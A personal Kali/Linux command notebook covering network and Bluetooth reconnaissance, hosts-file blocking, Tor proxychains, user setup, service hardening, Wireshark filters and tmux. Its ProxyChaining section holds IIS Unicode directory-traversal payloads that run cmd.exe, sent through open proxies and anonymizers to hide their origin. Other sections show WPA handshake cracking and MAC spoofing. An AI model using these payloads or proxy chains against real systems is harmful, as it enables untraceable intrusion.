$ sudo arp-scan -l -t 200 -I $(ls /sys/class/net | grep -o "wl[^\t]\+")
Interface: wlan0, type: EN10MB, MAC: b0:7d:64:e7:ba:a3, IPv4: 192.168.1.230
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.94	c2:a5:11:99:2e:38	(Unknown: locally administered)
192.168.1.253	c8:52:61:97:05:b2	ARRIS Group Inc.
192.168.1.254	c8:52:61:97:05:b0	ARRIS Group Inc.
192.168.1.129	d8:31:34:68:77:af	Roku Inc.
192.168.1.65	a4:8d:3b:1f:e8:53	Vizio Inc.
192.168.1.65	a4:8d:3b:1f:e8:53	Vizio Inc. (DUP: 2)
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.574 seconds (162.64 hosts/sec). 6 responded
Set a random MAC:
$ sudo macchanger -r wlan1
Current MAC:   00:c0:ca:8f:2b:07 (ALFA, INC.)
Permanent MAC: 00:c0:ca:8f:2b:07 (ALFA, INC.)
New MAC:       72:04:d5:1a:2f:a8 (unknown)
$ sudo macchanger -r wlan1
Current MAC:   72:04:d5:1a:2f:a8 (unknown)
Permanent MAC: 00:c0:ca:8f:2b:07 (ALFA, INC.)
New MAC:       4a:d8:99:bf:6e:b
$ sudo ifconfig wlan1 up
$ ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether c0:25:a5:16:53:2d  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 45  base 0xf000

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.160  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::d3b2:3a33:674c:eb6a  prefixlen 64  scopeid 0x20<link>
        ether b0:7d:64:e7:ba:a3  txqueuelen 1000  (Ethernet)
        RX packets 1922  bytes 397051 (387.7 KiB)
        RX errors 0  dropped 28  overruns 0  frame 0
        TX packets 887  bytes 128410 (125.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.3.112  netmask 255.255.255.0  broadcast 192.168.3.255
        inet6 fe80::44ad:62c7:252a:bc1f  prefixlen 64  scopeid 0x20<link>
        ether 4a:d8:99:bf:6e:bb  txqueuelen 1000  (Ethernet)
        RX packets 128  bytes 8246 (8.0 KiB)
        RX errors 0  dropped 94  overruns 0  frame 0
        TX packets 61  bytes 5980 (5.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Cracking with Hashcat: we need to convert our .cap file to the equivalent hashcat file format, .hccapx.
$ cap2hccapx.bin hackme.cap hackme.hccapx
Cracking with aircrack-ng:
$ aircrack-ng pwd-01.cap -w /usr/share/wordlists/rockyou.txt
$ aircrack-ng -w wordlist.txt kali-01.cap
$ sudo aircrack-ng (packet-file-name) -w (wordlist_path)
To clear the contents of the swap space.
swapoff -a && swapon -a
To clear the buffer cache (as root; sync first so that dirty pages are written out, since drop_caches only discards clean pages):
sync; echo 1 > /proc/sys/vm/drop_caches
---[Resources]--- (top)
Security in Linux Mint and Ubuntu: an Explanation and Some Tips
---[OSI Model]--- (top)
---[HTML Entities]--- (top)
---[Subnetting]--- (top)
---[MS Windows Section]--- (top)
---[MS Net command]---
---[The host file]--- (top)
The best resource: Steven Black (https://github.com/StevenBlack/hosts/blob/2.5.52/readme.md). There is also https://winhelp2002.mvps.org/hosts.txt
About once a month I pull down the latest version with the first command below. This places the latest version in the Hacking/hosts/ directory. I then open that hosts file alongside the production version and pull the custom entries (near the top) into the new hosts file. Then I copy the updated version over the production version with the second command.
$ wget https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts
$ sudo cp hosts /etc
This will reload the hosts file
sudo /etc/init.d/networking restart
sudo /etc/init.d/dns-clean start
# run this command to flush the dns cache:
sudo /etc/init.d/dns-clean restart
# or use:
sudo /etc/init.d/networking force-reload
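The monthly merge described above, written out as a script. This is an added example, not code from the notes or from the Steven Black project; it assumes the custom entries in the production file are bracketed by two marker comments, "# BEGIN CUSTOM" and "# END CUSTOM" (the notes only say "near the top"), and it validates the merged file before copying it into place so that a truncated download or a stray line cannot break name resolution for the whole machine.

```shell
#!/bin/sh
# Added example (not from the notes): merge the custom entries kept at the top of
# the production hosts file into a freshly downloaded Steven Black hosts file,
# validate the result, then install it.
# Assumption: the custom block is delimited by "# BEGIN CUSTOM" / "# END CUSTOM".

# Print the custom block (markers included) from a hosts file; empty if absent.
extract_custom_block() {
    awk '/^# BEGIN CUSTOM/{p=1} p{print} /^# END CUSTOM/{p=0}' "$1"
}

# Write $3 = custom block of $1 followed by the downloaded file $2.
merge_hosts() {
    prod="$1"; fresh="$2"; out="$3"
    { extract_custom_block "$prod"; cat "$fresh"; } > "$out"
}

# Sanity check: every non-comment, non-blank line must start with an IPv4/IPv6
# literal followed by at least one hostname. Exit status 1 if any line is bad.
validate_hosts() {
    awk '
      /^[[:space:]]*#/ || NF == 0 { next }
      $1 !~ /^[0-9a-fA-F:.]+$/ { bad++ }
      NF < 2 { bad++ }
      END { exit bad ? 1 : 0 }
    ' "$1"
}

# Count hostnames sinkholed to 0.0.0.0 (the style the Steven Black list uses);
# a sudden drop between runs is a cheap way to notice a bad download.
count_blocked() {
    awk '$1 == "0.0.0.0" { n += NF - 1 } END { print n + 0 }' "$1"
}

# The full procedure from the notes, with the copy guarded by validation.
# Usage (as root): update_hosts /etc/hosts ./hosts
update_hosts() {
    prod="$1"; fresh="$2"; merged="${fresh}.merged"
    merge_hosts "$prod" "$fresh" "$merged" || return 1
    validate_hosts "$merged" || { echo "refusing to install: malformed line(s) in $merged" >&2; return 1; }
    echo "$(count_blocked "$merged") hostnames blocked in $merged"
    cp "$prod" "${prod}.bak" && cp "$merged" "$prod"
}
```

Keeping the markers in the production file means the merge needs no manual copy-and-paste, and the .bak copy gives a one-command rollback if a resolver breaks after the update.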
---[Null Account]--- (top)
---[Connect to remote NTFS]---
---[ProxyChaining]--- (top)
GET www.private-server.com/cgi-bin/nph-a.cgi/http/127.0.0.1/Home.asp HTTP/1.0
GET proxy.spaceproxy.com/-_-http://127.0.0.1/Home.asp HTTP/1.0
GET ctservice.de/taker/cgi-bin/anon-www.cgi/http://127.0.0.1/Home.asp HTTP/1.0
These are examples of the above hops, carrying URL Unicode exploits:
GET 127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\winnt\repair HTTP/1.0
GET www.private-server.com/cgi-bin/nph-a.cgi/http/127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\winnt\repair HTTP/1.0
GET proxy.spaceproxy.com/-_-http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\winnt\repair HTTP/1.0
The goal: set up nc to send a bunch of 404s to TCP/80 so they land in the server's IIS logs, while hopping through a chain of proxies.
Step one: The command
echo -e "GET http://target.host.com/This_is_a_test HTTP/1.0\n\n" | nc target.host.com 80 | less
Step two: Bouncing the command through several proxies.
echo -e "GET http://proxy.spaceproxy.com/-_-http://target.host.com/This_is_a_test HTTP/1.0\n\n" | nc target.host.com 80 | less
Recently confirmed (open) proxies:
Examples (Linux) of piping the HTTP header lines to netcat.
echo -e "HEAD http://127.0.0.1/ HTTP/1.0\n\n" | netcat 202.30.54.66 80
echo -e "GET http://127.0.0.1 HTTP/1.0\n\n" | netcat 212.42.103.7 80
echo -e "GET http://127.0.0.1 HTTP/1.0\n\n" | netcat 194.65.39.17 80
echo -e "GET http://127.0.0.1 HTTP/1.0\n\n" | netcat 195.142.170.3 80
The following are examples of hopping through anonymizing services, which can be chained:
GET 127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\winnt\repair HTTP/1.0
GET www.private-server.com/cgi-bin/nph-a.cgi/http/127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\winnt\repair HTTP/1.0
GET proxy.spaceproxy.com/-_-http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\winnt\repair HTTP/1.0
Other anon services
sudo apt-get install tor
nano /etc/proxychains.conf
  Uncomment dynamic_chain.
  Comment out strict_chain and random_chain.
  Uncomment proxy_dns.
  Write "socks5 127.0.0.1 9050" as the last line of the proxy list.
service tor restart
proxychains firefox www.bing.com
https://www.geeksforgeeks.org/how-to-setup-proxychains-in-linux-without-any-errors/
proxychains nmap 192.168.1.1/24
Lets take a minute to break up the syntax above:
https://linuxhint.com/proxychains-tutorial/
Before using proxychains, we need to set up its configuration file, and we also need a list of proxy servers. The proxychains configuration file is located at /etc/proxychains.conf.
By default proxychains directly sends the traffic first through our host at 127.0.0.1 on port 9050 (the default Tor configuration). If you are using Tor, leave this as it is. If you are not using Tor, you will need to comment out this line.
Study this page:
---[Add a new Linux user account]--- (top)
Create the new account.
# adduser username
Add the new user to the sudo group.
# usermod -aG sudo username
Test the new user account.
# su - username
As the new user, verify that you can use sudo by prepending “sudo” to the command that you want to run with superuser privileges.
# sudo ls -la /root
Remember...
We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility.
---[Set a non-root user to run WireShark]--- (top)
Run these two commands, then log in/out of the non-root account.
$ sudo dpkg-reconfigure wireshark-common
$ sudo usermod -aG wireshark parth
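Both procedures above (the new sudo user and the non-root Wireshark user) come down to "append the account to a group, then check the membership took". Here is that sequence as a script with the verification built in. It is an added example, not the notes' own commands, and assumes a Debian-style system with adduser(8), usermod(8) and getent(1); the -a in usermod -aG is what keeps the user's other supplementary groups intact.

```shell
#!/bin/sh
# Added example (not from the notes): create an account, add it to a group such as
# sudo or wireshark, and verify the membership before handing the account over.
# Assumes adduser(8), usermod(8) and getent(1) as found on Debian/Kali/Ubuntu.

# Return 0 if user $2 is listed in the group line $1 ("name:x:gid:user1,user2").
user_in_group_line() {
    line="$1"; user="$2"
    members=$(printf '%s' "$line" | cut -d: -f4)
    case ",$members," in
        *",$user,"*) return 0 ;;
        *)            return 1 ;;
    esac
}

# Live check against the NSS database (covers LDAP/SSSD, unlike grepping /etc/group).
user_in_group() {
    line=$(getent group "$1") || return 1
    user_in_group_line "$line" "$2"
}

# Create the user if missing, append the group, then re-read the membership.
# The new membership only applies to sessions started after this, which is why
# the notes say to log out and back in (or use `su - user`) before testing.
provision_user() {
    user="$1"; group="$2"
    getent group "$group" >/dev/null || { echo "no such group: $group" >&2; return 1; }
    id "$user" >/dev/null 2>&1 || adduser "$user" || return 1
    usermod -aG "$group" "$user" || return 1   # -a: append, never replace the group list
    user_in_group "$group" "$user" || { echo "$user not in $group after usermod" >&2; return 1; }
    echo "$user is now in $group (effective at next login)"
}

# Usage (as root): provision_user username sudo
#                  provision_user parth wireshark
```

Checking via getent rather than assuming usermod succeeded matters most for the sudo case: a silent failure there leaves an account that cannot escalate, while a typo in the group name with the -G flag missing would have been the kind of mistake the membership check catches.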
---[Disabling rpcbind tcp/111]--- (top)
You can disable them by running the following commands as root:
update-rc.d nfs-common disable
update-rc.d rpcbind disable
For systemd, get root and stop the service
# systemctl stop rpcbind.service
Warning: Stopping rpcbind.service, but it can still be activated by:
  rpcbind.socket
disable the service:
# systemctl disable rpcbind.service
Synchronizing state of rpcbind.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install disable rpcbind
Removed /etc/systemd/system/sockets.target.wants/rpcbind.socket.
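The warning in the stop output above is the important part: rpcbind.socket can start the service again on the first connection to tcp/111, so disabling only rpcbind.service is not enough. The script below, an added example rather than the notes' own commands, disables both units and then verifies from the listening sockets that the port is actually closed. It assumes systemd and the ss(8) tool from iproute2.

```shell
#!/bin/sh
# Added example (not from the notes): fully disable rpcbind and verify that
# nothing is left listening on tcp/111. Assumes systemd and ss(8).

# Return 0 if the `ss -Hltn` output in $1 shows a listener on port $2.
# Local Address:Port is the 4th column; the port is whatever follows the last ':'
# so "0.0.0.0:111", "*:111" and "[::]:111" are all handled.
listening_on_port() {
    ss_output="$1"; port="$2"
    printf '%s\n' "$ss_output" | awk -v p="$port" '
        { n = split($4, a, ":"); if (a[n] == p) found = 1 }
        END { exit found ? 0 : 1 }'
}

# Live check: the service and the socket must both be disabled and inactive,
# and the port must be gone from the listener table.
rpcbind_fully_disabled() {
    for unit in rpcbind.service rpcbind.socket; do
        if systemctl is-enabled "$unit" >/dev/null 2>&1; then
            echo "$unit is still enabled" >&2; return 1
        fi
        if systemctl is-active "$unit" >/dev/null 2>&1; then
            echo "$unit is still active" >&2; return 1
        fi
    done
    if listening_on_port "$(ss -Hltn)" 111; then
        echo "something still listens on tcp/111" >&2; return 1
    fi
    return 0
}

# The disable sequence from the notes, extended to the socket unit.
# Usage (as root): disable_rpcbind
disable_rpcbind() {
    systemctl disable --now rpcbind.socket rpcbind.service && rpcbind_fully_disabled
}
```

If rpcbind_fully_disabled still reports a listener after both units are down, something other than rpcbind owns the port; `ss -ltnp` shows the owning process.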
---[Wireshark expressions]--- (top)
If you want to show the MAC addresses, or the names corresponding to the MAC addresses, in the columns in the packet summary, go to Edit -> Preferences, select "Columns", and for the "Source" and "Destination" columns, select "Hardware src addr" and "Hardware dest addr", respectively.
Show only SMTP (port 25) and ICMP traffic:
tcp.port eq 25 or icmp
Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:
ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
Filter on Windows -- Filter out noise, while watching Windows Client - DC exchanges
smb || nbns || dcerpc || nbss || dns
The "slice" feature is also useful to filter on the vendor identifier part (OUI) of the MAC address, see the Ethernet page for details. Thus you may restrict the display to only packets from a specific device manufacturer. E.g. for DELL machines only:
eth.addr[0:3]==00:06:5B
Capture only traffic to or from IP address 172.18.5.4:
host 172.18.5.4
Capture traffic to or from a range of IP addresses:
net 192.168.0.0/24 net 192.168.0.0 mask 255.255.255.0
Capture traffic from a range of IP addresses:
src net 192.168.0.0/24 src net 192.168.0.0 mask 255.255.255.0
Capture traffic to a range of IP addresses:
dst net 192.168.0.0/24 dst net 192.168.0.0 mask 255.255.255.0
Capture only DNS (port 53) traffic:
port 53
Capture non-HTTP and non-SMTP traffic on your server (both are equivalent):
host www.example.com and not (port 80 or port 25) host www.example.com and not port 80 and not port 25
Capture except all ARP and DNS traffic:
port not 53 and not arp
Capture traffic within a range of ports
(tcp[0:2] > 1500 and tcp[0:2] < 1550) or (tcp[2:2] > 1500 and tcp[2:2] < 1550)
Capture only Ethernet type EAPOL:
ether proto 0x888e
Designed to filter out certain types of protocols, this masks out ARP, ICMP, DNS or other protocols you think are not useful, so you can focus on the traffic that interests you.
!(arp or icmp or dns)
ICMP should be easy, just filter away echo request and reply (type 8 and 0). Unless you have funky stuff like address mask/timestamp requests that should only show problems. The best filter for this is
(icmp.type > 0 and icmp.type < 8) or icmp.type > 8
For bad TCP you could try to work with the filter
tcp.analysis.flags
all packets from/to the IP address 192.0.73.2, but that are error packets
ip.addr==192.0.73.2 and expert.severity==error
You can utilize following filters:
tcp.analysis.lost_segment – Indicates we’ve seen a gap in sequence numbers in the capture. Packet loss can lead to duplicate ACKs, which leads to retransmissions.
tcp.analysis.retransmission – Displays all retransmissions in the capture. A few retransmissions are OK, excessive retransmissions are bad. This usually shows up as slow application performance and/or packet loss to the user.
TCP buffer full -- Source is instructing Destination to stop sending data
tcp.window_size == 0 && tcp.flags.reset != 1
ip.addr == 10.43.54.65 is equivalent to ip.src == 10.43.54.65 or ip.dst == 10.43.54.65
Match destination: ip.dst == x.x.x.x
Match source: ip.src == x.x.x.x
Match either: ip.addr == x.x.x.x
net 192.168.0.0 mask 255.255.255.0
net 192.168.0.0/24 or net 192.168.0.0 mask 255.255.255.0
src net 192.168.0.0/24 or src net 192.168.0.0 mask 255.255.255.0
dst net 192.168.0.0/24 or dst net 192.168.0.0 mask 255.255.255.0
Capture only unicast traffic - useful to get rid of noise on the network if you only want to see traffic to and from your machine, not, for example, broadcast and multicast announcements:
not broadcast and not multicast
Show only the UDP based traffic:
udp
---[Kali Persistence]--- (top)
Setting Kali up on a USB with persistence
dd if=Downloads/kali-linux-2019.3-amd64.iso of=/dev/sdc bs=1M
dd if=Downloads/kali-linux-2019.4-amd64.iso of=/dev/sdc bs=512k
Ref: https://docs.kali.org/downloading/kali-linux-live-usb-persistence
Now open cfdisk to create a new primary partition from all the free space at the end of the disk. Then exit cfdisk.
$ sudo cfdisk /dev/sdb
Now format the new partition.
sudo mkfs.ext4 /dev/sdb3
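The dd / cfdisk / mkfs.ext4 steps above are the dangerous kind: dd of=/dev/sdX overwrites whatever disk that name currently refers to (note that the notes themselves use /dev/sdc for dd and /dev/sdb for cfdisk, which is exactly the mistake to guard against). Below is the sequence as a script with checks that the target is a whole disk other than sda and has nothing mounted. This is an added example, not the notes' or Kali's own script; the "persistence" label and the "/ union" persistence.conf come from the Kali documentation linked above, and the assumption that the new partition is number 3 follows the notes.

```shell
#!/bin/sh
# Added example (not from the notes): write a Kali live image to a USB stick and
# add the persistence partition, refusing to touch a disk that is mounted or
# that is not a whole sd[b-z] device. Assumes the persistence partition ends up
# as ${dev}3 as in the notes; "persistence" label and persistence.conf per Kali docs.

# Return 0 if $1 (e.g. /dev/sdb) or any of its partitions appears as the device
# column of the /proc/mounts-style text in $2.
device_is_mounted() {
    dev="$1"; mounts="$2"
    printf '%s\n' "$mounts" | awk -v d="$dev" 'index($1, d) == 1 { found = 1 } END { exit found ? 0 : 1 }'
}

# Accept only whole-disk names; /dev/sda is assumed to be the system disk and
# partition names (/dev/sdb1) are rejected because dd must target the whole device.
is_whole_disk_name() {
    case "$1" in
        /dev/sd[b-z]) return 0 ;;
        *)            return 1 ;;
    esac
}

# Live wrapper. Usage (as root): make_persistent_usb ~/Downloads/kali-linux-2019.4-amd64.iso /dev/sdb
make_persistent_usb() {
    iso="$1"; dev="$2"
    [ -r "$iso" ] || { echo "cannot read ISO: $iso" >&2; return 1; }
    is_whole_disk_name "$dev" || { echo "refusing: $dev is not a whole disk (sd[b-z])" >&2; return 1; }
    if device_is_mounted "$dev" "$(cat /proc/mounts)"; then
        echo "refusing: $dev has mounted partitions; umount them first" >&2; return 1
    fi
    dd if="$iso" of="$dev" bs=1M status=progress && sync || return 1
    cfdisk "$dev"                          # interactive: add one primary partition in the free space
    mkfs.ext4 -L persistence "${dev}3" || return 1   # the label is required by the live boot
    mkdir -p /mnt/my_usb && mount "${dev}3" /mnt/my_usb || return 1
    echo "/ union" > /mnt/my_usb/persistence.conf
    umount /mnt/my_usb
}
```

Run `lsblk` before calling it and compare the size column against the stick; the whole-disk and mount checks catch the common slips but cannot tell two identical USB sticks apart.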
Updating USB Kali (https://www.kali.org/docs/usb/updating-kali-on-usb/)
---[tmux]--- (top)
https://leanpub.com/the-tao-of-tmux/read
Ctrl+b c      Create a new window (with shell). The first available number from the range 0...9 will be assigned to it.
Ctrl+b w      Choose window from a list
Ctrl+b 0      Switch to window 0 (by number)
Ctrl+b ,      Rename the current window
Ctrl+b %      Split current pane horizontally into two panes
Ctrl+b "      Split current pane vertically into two panes
Ctrl+b o      Go to the next pane
Ctrl+b ;      Toggle between the current and previous pane
Ctrl+b x      Close the current pane
Ctrl+b ?      Help screen
Ctrl+b d      Detach from the session
Reattach: tmux attach-session -t my_session

Command                 Result
Prefix + c              Create a new window
Prefix + p              Switch to the previous window
Prefix + n              Switch to the next window
Prefix + 0-9            Switch to a window using its index number
Prefix + w              Choose a window from an interactive list
exit                    Close a window
Prefix + &              Force kill all processes in an unresponsive window
Prefix + "              Split the active pane horizontally
Prefix + %              Split the active pane vertically
Prefix + arrow key      Switch to another pane
Prefix + ALT+arrow      Resize the active pane
Prefix + z              Zoom in on the active pane. Press the same combination again to exit zoom mode
Prefix + x              Force kill an unresponsive process in a pane
Prefix + (              Switch to the previous session
Prefix + )              Switch to the next session
Prefix + s              Display an interactive session list
tmux ls                 List all available sessions
tmux attach -t 0        Attach to session 0
tmux kill-server        Destroy all sessions and kill all processes
Customize tmux by editing the ~/.tmux.conf file.
Start tmux with this syntax:
$ tmux source-file ~/.tmux.conf
https://man.openbsd.org/OpenBSD-current/man1/tmux.1
https://blog.hawkhost.com/2010/07/02/tmux-%e2%80%93-the-terminal-multiplexer-part-2/
---[Bluetooth]--- (top)
Sometimes, it happens that the Bluetooth device itself is blocked/disabled. This could happen due to software or hardware reasons. To check the device status, use the rfkill list command:
$ sudo rfkill list
0: phy0: Wireless LAN
	Soft blocked: no
	Hard blocked: no
3: hci0: Bluetooth
	Soft blocked: no
	Hard blocked: no
$ sudo service bluetooth status
bluetooth.service - Bluetooth service
     Loaded: loaded (/lib/systemd/system/bluetooth.service; disabled; vendor preset: disabled)
     Active: inactive (dead)
       Docs: man:bluetoothd(8)
$ sudo service bluetooth start
$ sudo service bluetooth status
bluetooth.service - Bluetooth service
     Loaded: loaded (/lib/systemd/system/bluetooth.service; disabled; vendor preset: disabled)
     Active: active (running) since Thu 2021-08-05 15:38:23 EDT; 2s ago
       Docs: man:bluetoothd(8)
   Main PID: 7869 (bluetoothd)
     Status: "Running"
      Tasks: 1 (limit: 37667)
     Memory: 2.8M
        CPU: 40ms
     CGroup: /system.slice/bluetooth.service
             7869 /usr/libexec/bluetooth/bluetoothd
Aug 05 15:38:23 parth systemd[1]: Starting Bluetooth service...
Aug 05 15:38:23 parth bluetoothd[7869]: Bluetooth daemon 5.55
Aug 05 15:38:23 parth systemd[1]: Started Bluetooth service.
Aug 05 15:38:23 parth bluetoothd[7869]: Starting SDP server
Aug 05 15:38:23 parth bluetoothd[7869]: Bluetooth management interface 1.18 initialized
Aug 05 15:38:23 parth bluetoothd[7869]: profiles/sap/server.c:sap_server_register() Sap driver initialization failed.
Aug 05 15:38:23 parth bluetoothd[7869]: sap-server: Operation not permitted (1)
Aug 05 15:38:23 parth bluetoothd[7869]: Endpoint registered: sender=:1.51 path=/MediaEndpoint/A2DPSink/sbc
Aug 05 15:38:23 parth bluetoothd[7869]: Endpoint registered: sender=:1.51 path=/MediaEndpoint/A2DPSource/sbc
$ bluelog
Bluelog (v1.1.2) by MS3FGX
---------------------------
Autodetecting device...OK
Opening output file: bluelog-2021-08-05-1542.log...OK
Writing PID file: /tmp/bluelog.pid...OK
Scan started at [08/05/21 15:42:47] on 08:BE:AC:13:FF:0F.
Hit Ctrl+C to end scan.
^C
Closing files and freeing memory...Done!
$ cat bluelog-2021-08-05-1542.log
A8:2B:B9:1C:39:C7
Above, my Samsung Android phone was identified.
https://javahowtos.com/guides/129-linux/404-troubleshoot-and-enable-bluetooth-on-kali-linux.html
Resources: https://wiki.debian.org/BluetoothUser
$ sudo btmon Bluetooth monitor ver 5.50 = Note: Linux version 5.3.0-kali1-amd64 (x86_64) 0.698854 = Note: Bluetooth subsystem version 2.22 0.698856 = New Index: FC:F8:AE:26:86:F2 (Primary,USB,hci0) [hci0] 0.698857 = Open Index: FC:F8:AE:26:86:F2 [hci0] 0.698857 = Index Info: FC:F8:AE:26:86:F2 (Intel Corp.) [hci0] 0.698858 @ RAW Open: dumpcap (privileged) version 2.22 {0x0002} [hci0] 0.698858 @ MGMT Open: bluetoothd (privileged) version 1.14 {0x0001} 0.698859 @ MGMT Open: btmon (privileged) version 1.14 {0x0003} 0.698905 > HCI Event: Extended Inquiry Result (0x2f) plen 255 #1 [hci0] 1.297549 Num responses: 1 Address: EB:06:EF:EE:83:4B (OUI EB-06-EF) Page scan repetition mode: R1 (0x01) Page period mode: P0 (0x00) Class: 0x240404 Major class: Audio/Video (headset, speaker, stereo, video, vcr) Minor class: Wearable Headset Device Rendering (Printing, Speaker) Audio (Speaker, Microphone, Headset) Clock offset: 0x34ba RSSI: -43 dBm (0xd5) Name (complete): SH03 TX power: 4 dBm 16-bit Service UUIDs (partial): 7 entries Advanced Audio Distribution (0x110d) Audio Sink (0x110b) A/V Remote Control (0x110e) A/V Remote Control Controller (0x110f) Handsfree (0x111e) Headset (0x1108) Headset HS (0x1131) @ MGMT Event: Device Found (0x0012) plen 44 {0x0003} [hci0] 1.297632 BR/EDR Address: EB:06:EF:EE:83:4B (OUI EB-06-EF) RSSI: -43 dBm (0xd5) Flags: 0x00000000 Data length: 30 Name (complete): SH03 TX power: 4 dBm 16-bit Service UUIDs (partial): 7 entries Advanced Audio Distribution (0x110d) Audio Sink (0x110b) A/V Remote Control (0x110e) A/V Remote Control Controller (0x110f) Handsfree (0x111e) Headset (0x1108) Headset HS (0x1131) Class: 0x240404 Major class: Audio/Video (headset, speaker, stereo, video, vcr) Minor class: Wearable Headset Device Rendering (Printing, Speaker) Audio (Speaker, Microphone, Headset) @ MGMT Event: Device Found (0x0012) plen 44 {0x0001} [hci0] 1.297632 BR/EDR Address: EB:06:EF:EE:83:4B (OUI EB-06-EF) RSSI: -43 dBm (0xd5) Flags: 0x00000000 Data length: 30 
Name (complete): SH03 TX power: 4 dBm 16-bit Service UUIDs (partial): 7 entries Advanced Audio Distribution (0x110d) Audio Sink (0x110b) A/V Remote Control (0x110e) A/V Remote Control Controller (0x110f) Handsfree (0x111e) Headset (0x1108) Headset HS (0x1131) Class: 0x240404 Major class: Audio/Video (headset, speaker, stereo, video, vcr) Minor class: Wearable Headset Device Rendering (Printing, Speaker) Audio (Speaker, Microphone, Headset) > HCI Event: Inquiry Complete (0x01) plen 1 #2 [hci0] 8.806555 Status: Success (0x00) < HCI Command: LE Set Scan Enable (0x08|0x000c) plen 2 #3 [hci0] 8.813057 Scanning: Disabled (0x00) Filter duplicates: Disabled (0x00) > HCI Event: Command Complete (0x0e) plen 4 #4 [hci0] 8.814487 LE Set Scan Enable (0x08|0x000c) ncmd 2 Status: Success (0x00) @ MGMT Event: Device Found (0x0012) plen 33 {0x0003} [hci0] 8.814575 LE Address: D8:80:39:F9:A5:4A (Microchip Technology Inc.) RSSI: -86 dBm (0xaa) Flags: 0x00000000 Data length: 19 Flags: 0x02 LE General Discoverable Mode Name (complete): MD88039F9-A54A @ MGMT Event: Device Found (0x0012) plen 33 {0x0001} [hci0] 8.814575 LE Address: D8:80:39:F9:A5:4A (Microchip Technology Inc.) RSSI: -86 dBm (0xaa) Flags: 0x00000000 Data length: 19 Flags: 0x02 LE General Discoverable Mode Name (complete): MD88039F9-A54A @ MGMT Event: Discovering (0x0013) plen 2 {0x0003} [hci0] 8.814642 Address type: 0x07 BR/EDR LE Public LE Random Discovery: Disabled (0x00) $ sudo /etc/init.d/bluetooth status bluetooth.service - Bluetooth service Loaded: loaded (/lib/systemd/system/bluetooth.service; disabled; vendor preset: disabled) Active: active (running) since Thu 2019-11-07 12:39:35 EST; 10h ago Docs: man:bluetoothd(8) Main PID: 2736 (bluetoothd) Status: "Running" Tasks: 1 (limit: 4915) Memory: 1.4M CGroup: /system.slice/bluetooth.service 2736 /usr/lib/bluetooth/bluetoothd Nov 07 23:14:10 wintermute bluetoothd[2736]: Sap driver initialization failed. 
Nov 07 23:14:10 wintermute bluetoothd[2736]: sap-server: Operation not permitted (1) Nov 07 23:14:10 wintermute bluetoothd[2736]: RFCOMM server failed for Headset Voice gatewa… (98) Nov 07 23:14:10 wintermute bluetoothd[2736]: RFCOMM server failed for :1.74/Profile/HSPHSP… (98) Nov 07 23:14:10 wintermute bluetoothd[2736]: Failed to set mode: Blocked through rfkill (0x12) Nov 07 23:14:10 wintermute bluetoothd[2736]: Endpoint registered: sender=:1.201 path=/Medi…k/sbc Nov 07 23:14:10 wintermute bluetoothd[2736]: Endpoint registered: sender=:1.201 path=/Medi…e/sbc Nov 07 23:14:10 wintermute bluetoothd[2736]: Endpoint registered: sender=:1.74 path=/Media…k/sbc Nov 07 23:14:10 wintermute bluetoothd[2736]: Endpoint registered: sender=:1.74 path=/Media…e/sbc Nov 07 23:14:10 wintermute bluetoothd[2736]: Failed to set mode: Blocked through rfkill (0x12) Hint: Some lines were ellipsized, use -l to show in full. https://www.hackers-arise.com/single-post/2018/01/30/BlueTooth-Hacking-Part-2-BlueTooth-Reconnaissance $ sudo hciconfig hciconfig - HCI device configuration utility hci0: Type: Primary Bus: USB BD Address: FC:F8:AE:26:86:F2 ACL MTU: 1021:5 SCO MTU: 96:5 DOWN RX bytes:1295 acl:0 sco:0 events:148 errors:0 TX bytes:25328 acl:0 sco:0 commands:147 errors:0 $ sudo hciconfig hci0 up Can't init device hci0: Operation not possible due to RF-kill (132) parth@wintermute:~$ $ sudo hcitool scan Device is not available: No such device $ sudo /etc/init.d/bluetooth start Starting bluetooth (via systemctl): bluetooth.service. $ sudo hcitool inq Inquiring ... 
